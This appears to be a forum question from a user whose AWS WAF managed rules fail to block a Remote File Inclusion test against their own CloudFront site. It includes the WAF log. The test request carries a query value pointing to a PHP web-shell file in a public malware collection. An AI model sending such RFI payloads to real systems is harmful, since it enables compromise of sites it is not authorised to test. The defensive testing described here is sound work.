DashVibe

I'm currently trying to setup a Cloudfront distribution with a web ACL (WAF). I enabled the AWS managed rule called AWSManagedRulesCommonRuleSet (documentation to this rule can be found here: https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html).

I'm testing a Remote File Inclusion, for which I would expect my query to be blocked by the WAF. Unfortunately, my request still goes through. My query is GET https://api.{mywebsite}.com/?test=https%3A%2F%2Fraw.githubusercontent.com%2Fmarcocesarato%2FPHP-Malware-Collection%2Fmaster%2Fclassic%2Fsimattacker.php, so a simple GET query to https://api.{mywebsite}.com with a query parameter test=https://raw.githubusercontent.com/marcocesarato/PHP-Malware-Collection/master/classic/simattacker.php

I enabled the log for the WAF, here you can see that my query is not block, despite the RFI present.

{ "timestamp": 1697798175056, "formatVersion": 1, "webaclId": "arn:aws:wafv2:us-east-1:249461922481:global/webacl/waf-demo/ce82b689-0a46-4018-a992-80f6d03a1ca3", "terminatingRuleId": "Default_Action", "terminatingRuleType": "REGULAR", "action": "ALLOW", "terminatingRuleMatchDetails": [], "httpSourceName": "CF", "httpSourceId": "E2HC5UK2JK9WVG", "ruleGroupList": [ { "ruleGroupId": "AWS#AWSManagedRulesPHPRuleSet", "terminatingRule": null, "nonTerminatingMatchingRules": [], "excludedRules": null, "customerConfig": null }, { "ruleGroupId": "AWS#AWSManagedRulesLinuxRuleSet", "terminatingRule": null, "nonTerminatingMatchingRules": [], "excludedRules": null, "customerConfig": null }, { "ruleGroupId": "AWS#AWSManagedRulesKnownBadInputsRuleSet", "terminatingRule": null, "nonTerminatingMatchingRules": [], "excludedRules": null, "customerConfig": null }, { "ruleGroupId": "AWS#AWSManagedRulesCommonRuleSet", "terminatingRule": null, "nonTerminatingMatchingRules": [], "excludedRules": null, "customerConfig": null }, { "ruleGroupId": "AWS#AWSManagedRulesUnixRuleSet", "terminatingRule": null, "nonTerminatingMatchingRules": [], "excludedRules": null, "customerConfig": null }, { "ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet", "terminatingRule": null, "nonTerminatingMatchingRules": [], "excludedRules": null, "customerConfig": null } ], "rateBasedRuleList": [ { "rateBasedRuleId": "arn:aws:wafv2:us-east-1:249461922481_MANAGED:global/ipset/ce82b689-0a46-4018-a992-80f6d03a1ca3_d03fd8aa-b178-4da6-9da3-1b3a6511b176_IPV4/d03fd8aa-b178-4da6-9da3-1b3a6511b176", "rateBasedRuleName": "limit", "limitKey": "IP", "maxRateAllowed": 100, "limitValue": "{redacted}" } ], "nonTerminatingMatchingRules": [], "requestHeadersInserted": null, "responseCodeSent": null, "httpRequest": { "clientIp": "213.49.129.107", "country": "BE", "headers": [ { "name": "host", "value": "api.{mywebsite}.com" }, { "name": "user-agent", "value": "insomnia/8.3.0" }, { "name": "accept", "value": "*/*" }, { "name": "content-length", "value": "0" } ], "uri": "/", "args": "test=https%3A%2F%2Fraw.githubusercontent.com%2Fmarcocesarato%2FPHP-Malware-Collection%2Fmaster%2Fclassic%2Fsimattacker.php", "httpVersion": "HTTP/2.0", "httpMethod": "GET", "requestId": "45Jf2TK56hWIioDaQJgDVDFVgUVmULWq2OqRMbhmPQjXQW8lFYMNrA==" }, "ja3Fingerprint": "4ea056e63b7910cbf543f0c095064dfe" } 

Could you help me understand what happens ? Thanks

Know someone who can answer? Share a link to this question via email, Twitter, or Facebook.

ncG1vNJzZmirpJawrLvVnqmfpJ%2Bse6S7zGiorp2jqbawutJobnBrY2WAcYSOmq6sZaeWs26%2B1KWcZpmnqLqiusCgnJ2qpaGytK%2FOpqSopqKquaa%2FxK1knaeVqHqvu9Nmqp6dnWLBsHnWqKmkZaCnvLGx0aWw